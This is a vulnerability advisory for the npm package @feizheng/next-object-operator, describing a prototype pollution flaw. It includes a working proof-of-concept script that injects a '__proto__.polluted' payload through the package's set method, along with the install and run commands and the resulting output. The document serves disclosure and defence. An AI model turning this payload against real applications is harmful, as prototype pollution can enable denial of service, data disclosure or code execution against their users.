vulnerability prototype pollution
severity 7.3
language javascript
registry npm


@feizheng/next-object-operator is vulnerable to Prototype Pollution. This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior using a proto payload, which may result in Sensitive Information Disclosure/Denial of Service(DoS)/Remote Code Execution.

Proof of Concept

  1. Create the following PoC file:
// poc.js
var nextObjectOperator = require("@feizheng/next-object-operator")

const data = {};
const operator = new nextObjectOperator(data);

console.log("Before : " + {}.polluted);
operator.set('__proto__.polluted', 'Yes! Its Polluted')
console.log("After : " + {}.polluted);
  1. Execute the following commands in another terminal:
npm i @feizheng/next-object-operator # Install affected module
node poc.js #  Run the PoC
  1. Check the Output:
Before : undefined
After : Yes! Its Polluted